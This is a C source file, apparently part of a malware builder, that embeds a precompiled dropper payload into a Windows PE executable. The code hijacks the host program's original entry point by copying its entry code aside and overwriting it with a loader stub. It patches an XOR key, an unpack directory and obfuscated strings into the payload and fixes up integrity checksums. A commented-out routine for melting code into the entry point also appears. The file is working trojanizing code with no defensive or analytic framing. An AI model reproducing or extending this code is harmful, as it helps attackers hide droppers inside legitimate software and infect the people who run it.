/**
 *	Loader.c
 **/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "drop.h"
#include "polym.h"
#include "bit.h"
#include "hde.h"

extern char _x86_pe_32[];		// PE.dropper.32
extern int _x86_pe_32_size;		// size 11826
extern char _x86_pe_32_dbg[];	// PE.dropper.32.debug
extern int _x86_pe_32_dbg_size; // size 7867

#ifdef __cplusplus
	extern "C" {
#endif
	DWORD __stdcall crc_calc(DWORD offset, unsigned long size);
	
	//DWORD crctable;

#ifdef __cplusplus
	}
#endif

#define NODEBUG_INDEX_ORIGINALHEADERSIZE	0x00002A72
#define NODEBUG_INDEX_ORIGINALCODE			0x00002A7A
#define NODEBUG_INDEX_ORIGINALCODESIZE		0x00002A82
#define	NODEBUG_INDEX_ORIGINALEP			0x00002A8A
#define NODEBUG_INDEX_ADDRORIGINALHEADER	0x00002A92
#define	NODEBUG_INDEX_ENTRYPOINTOFFSET		0x00002A9A
#define NODEBUG_INDEX_ORIGINALFILESIZE		0x000029CB
#define NODEBUG_INDEX_UNPACKDIR				0x88
#define NODEBUG_INDEX_WSPRINTFSTR			0x300
#define NODEBUG_INDEX_XOR					0x131a
#define NODEBUG_SIZE_LDR_DATA				0x412

#define DEBUG_INDEX_ORIGINALHEADERSIZE		0x00001AF6
#define DEBUG_INDEX_ORIGINALCODE			0x00001AFE
#define DEBUG_INDEX_ORIGINALCODESIZE		0x00001B06
#define	DEBUG_INDEX_ORIGINALEP				0x00001B0E
#define DEBUG_INDEX_ADDRORIGINALHEADER		0x00001B16
#define	DEBUG_INDEX_ENTRYPOINTOFFSET		0x00001B1E
#define DEBUG_INDEX_ORIGINALFILESIZE		0x00001A4F
#define DEBUG_INDEX_UNPACKDIR				0x88
#define DEBUG_INDEX_WSPRINTFSTR				0x300
#define DEBUG_INDEX_XOR						0x8f3
#define DEBUG_SIZE_LDR_DATA					0x412

static DWORD *OriginalHeaderSize;		// *
static DWORD *OriginalFileSize;			// *
static DWORD *EntryPointOffset;			// *
static DWORD OEPRva;					
static DWORD OldCodeOffs;				
static DWORD OldCodeSize;
static DWORD *OriginalCodeSize;			// *
static DWORD *OriginalEP;				// *
static DWORD NextStageOff;
static DWORD NextStageRVA;
static DWORD RealLdrRVA;
static DWORD *OriginalCode;				// *
static DWORD *OriginalAddrHeader;		//

unsigned char *PtrCode = NULL;
unsigned int PtrSize = 0;

// EncryptString
void EncryptString(char *ptr, size_t size)
{
	unsigned int i;

	if (size == 0) size = strlen(ptr);

	for(i = 0; i < size; i++) {
		ptr[i] = ROL8(ptr[i] ^ 0x44,3);
	}
}

void PrepareRealLoader(LoaderInfo *info, BOOL DebugVersion)
{
	PEInfoPtr pInfo;
	unsigned int i;

	pInfo = info->pPEInfo;

	*OriginalCode = OffsetToRva(OldCodeOffs, pInfo->ImageNtHeaders);
	*OriginalCodeSize = OldCodeSize;
	*OriginalEP = OEPRva;

	if (DebugVersion) {
		for(i=0; i < strlen(info->UnpackDir); i++)
			PtrCode[DEBUG_INDEX_UNPACKDIR+i] = info->UnpackDir[i];
	} else {
		for(i=0; i < strlen(info->UnpackDir); i++)
			PtrCode[NODEBUG_INDEX_UNPACKDIR+i] = info->UnpackDir[i];
	}

	if (DebugVersion) {
		EncryptString(&PtrCode[DEBUG_INDEX_UNPACKDIR], 257);
		EncryptString(&PtrCode[DEBUG_INDEX_WSPRINTFSTR], 13);
	} else {
		EncryptString(&PtrCode[NODEBUG_INDEX_UNPACKDIR], 257);
		EncryptString(&PtrCode[NODEBUG_INDEX_WSPRINTFSTR], 13);
	}

	for(i=0; i < PtrSize; i++) {
		unsigned long *ptr = (unsigned long*) &PtrCode[i];
		if (*ptr == 0x00801f0f) {
			unsigned long s = PtrCode[i+7] + (PtrCode[i+8] << 8);
			DWORD crcVal = crc_calc((DWORD)(&PtrCode[i+0x0d]), s);
			memcpy(&PtrCode[i+3], &crcVal, sizeof(crcVal));

		}
	}
}

//extern BOOL IsRelocated(DWORD address, PEInfo *pPEInfo, short size);

/***
 *	Calc new size for payload
 ***/
/*
void MeltIntoOEP(BYTE *originalOEP, BYTE *payload, int payloadSize, PEInfo *pPEInfo, DWORD RVAOFFSET)
{
	HDE_STRUCT eip;
	HDE_STRUCT payloadeip;
	
	while(payloadSize > 0) {
		int requiredBytes = 0;
		if (*payload == 0xEB) {
			requiredBytes = 3;
		} else {
			hde_disasm(payload, &payloadeip);

			requiredBytes = payloadeip.len;
		}

		do
		{
			hde_disasm(originalOEP, &eip);
			originalOEP += eip.len;
			RVAOFFSET += eip.len;
		} while(IsRelocated(RVAOFFSET, pPEInfo, eip.len) == FALSE);
	
		payload += requiredBytes;
		payloadSize -= payloadeip.len;

	}
	
	hde_disasm(originalOEP, &eip);
}

void CopyMeltIntoOEP(BYTE *originalOEP, BYTE *payload, int payloadSize, PEInfo *pPEInfo, DWORD RVAOFFSET)
{
	char *tmpOUT = NULL;

	HDE_STRUCT eip;


}
*/
void PrepareAndCopyLdrs(LoaderInfo *info, BOOL DebugVersion)
{
	DWORD tmp2, resBuild1, result2, result3, offsetDROP, offsetOEP;
	DWORD destOffset;

	unsigned char tmpBuffer[0x10c];

	NextStageOff = IntervalRand(info->CurrentOffset, info->CurrentOffset+0x64);
	info->CurrentOffset = NextStageOff;

	NextStageRVA = OffsetToRva(info->CurrentOffset, info->pPEInfo->ImageNtHeaders);

#ifdef _CONSOLE
	printf("\nMEMSET tmpBuffer");	fflush(stdout);
#endif

	memset(tmpBuffer, 0x90, sizeof(tmpBuffer));

#ifdef _CONSOLE
	printf("\nInvoke Build1Loader"); fflush(stdout);
#endif

	resBuild1 = Build1Loader(info->pPEInfo, (DWORD)&tmpBuffer, NextStageRVA);
	OldCodeOffs = info->CurrentOffset + 0x70;
	
	result2 = RvaToOffset(info->pPEInfo->ImageNtHeaders->OptionalHeader.AddressOfEntryPoint, info->pPEInfo->ImageNtHeaders);
	result2 += (DWORD)(info->pPEInfo->FileBase);
	
	result3 = OldCodeOffs + (DWORD)(info->pPEInfo->FileBase);
	/* Transfer old OEP to dropper...
	*/
	memcpy((void*)result3, (void*)(result2), resBuild1);

	offsetOEP = RvaToOffset(OEPRva, info->pPEInfo->ImageNtHeaders) + (DWORD)(info->pPEInfo->FileBase);

	memcpy((void*)offsetOEP, tmpBuffer, resBuild1);
	
	info->CurrentOffset += 0x70;
	info->CurrentOffset += resBuild1;
	OldCodeSize = resBuild1;
	info->CurrentOffset += PtrSize;

	PrepareRealLoader(info, DebugVersion);

	offsetDROP = info->CurrentOffset;
	offsetDROP -= PtrSize;
	offsetDROP += (DWORD)(info->pPEInfo->FileBase);
	memcpy((void *)offsetDROP, PtrCode, PtrSize);

	offsetDROP += PtrSize;
	destOffset = (DWORD)info->pPEInfo->FileBase;
	destOffset += (DWORD)info->pPEInfo->EntryPointOffset;

	memcpy((void *)offsetDROP, info->pPEInfo->OldEntryBackup, info->pPEInfo->oldHeaderSize);

	tmp2 = info->CurrentOffset - PtrSize;
	RealLdrRVA = OffsetToRva(tmp2, info->pPEInfo->ImageNtHeaders);

	if (DebugVersion) {
		Build15Loader(info->pPEInfo, NextStageOff + 0x15 + (DWORD)info->pPEInfo->FileBase, RealLdrRVA, PtrSize, DEBUG_SIZE_LDR_DATA);
	} else {
		Build15Loader(info->pPEInfo, NextStageOff + 0x15 + (DWORD)info->pPEInfo->FileBase, RealLdrRVA, PtrSize, NODEBUG_SIZE_LDR_DATA);
	}
}


BOOL __stdcall ContinueWork(LoaderInfo *info, DWORD xor, BOOL DebugVersion)
{
	PEInfoPtr pInfo;
	PIMAGE_NT_HEADERS pNTHeaders;; 

	if (DebugVersion == false) {
		PtrCode = malloc(_x86_pe_32_size);
		memcpy(PtrCode, _x86_pe_32, _x86_pe_32_size);
		PtrSize = _x86_pe_32_size;
	} else {
		PtrCode = malloc(_x86_pe_32_dbg_size);
		memcpy(PtrCode, _x86_pe_32_dbg, _x86_pe_32_dbg_size);
		PtrSize = _x86_pe_32_dbg_size;
	}

	if (DebugVersion) {
		OriginalHeaderSize = (DWORD *)(PtrCode + DEBUG_INDEX_ORIGINALHEADERSIZE);
		OriginalFileSize = (DWORD *)(PtrCode + DEBUG_INDEX_ORIGINALFILESIZE);
		EntryPointOffset = (DWORD *)(PtrCode + DEBUG_INDEX_ENTRYPOINTOFFSET);
		OriginalCodeSize = (DWORD *)(PtrCode + DEBUG_INDEX_ORIGINALCODESIZE);
		OriginalEP = (DWORD *)(PtrCode + DEBUG_INDEX_ORIGINALEP);
		OriginalCode = (DWORD *)(PtrCode + DEBUG_INDEX_ORIGINALCODE);
		OriginalAddrHeader = (DWORD *)(PtrCode + DEBUG_INDEX_ADDRORIGINALHEADER);
	} else {
		OriginalHeaderSize = (DWORD *)(PtrCode + NODEBUG_INDEX_ORIGINALHEADERSIZE);
		OriginalFileSize = (DWORD *)(PtrCode + NODEBUG_INDEX_ORIGINALFILESIZE);
		EntryPointOffset = (DWORD *)(PtrCode + NODEBUG_INDEX_ENTRYPOINTOFFSET);
		OriginalCodeSize = (DWORD *)(PtrCode + NODEBUG_INDEX_ORIGINALCODESIZE);
		OriginalEP = (DWORD *)(PtrCode + NODEBUG_INDEX_ORIGINALEP);
		OriginalCode = (DWORD *)(PtrCode + NODEBUG_INDEX_ORIGINALCODE);
		OriginalAddrHeader = (DWORD *)(PtrCode + NODEBUG_INDEX_ADDRORIGINALHEADER);
	}

	if (info == NULL)		// Invalid pointer
		return 0;

	pInfo = info->pPEInfo;
	pNTHeaders = pInfo->ImageNtHeaders;

	if (DebugVersion) {
		PtrCode[DEBUG_INDEX_XOR] = (unsigned char)(xor & 0xff);
	} else {
		PtrCode[NODEBUG_INDEX_XOR] = (unsigned char)(xor & 0xff);
	}

	*OriginalHeaderSize = pInfo->oldHeaderSize;
	*OriginalFileSize = pInfo->fileSize;
	*EntryPointOffset = pInfo->EntryPointOffset;
	//*OriginalAddrHeader = pInfo->
	OEPRva = pInfo->ImageOptionalHeader->AddressOfEntryPoint;


	//
	PrepareAndCopyLdrs(info, DebugVersion);

	// TRANSFER!
	//memcpy(PtrCode + _INDEX_OLDCODESIZE, &OldCodeSize, sizeof(DWORD));
	//memcpy(PtrCode + _INDEX_ORIGINALCODESIZE, &OriginalCodeSize, sizeof(DWORD));
	
	return 1;
}
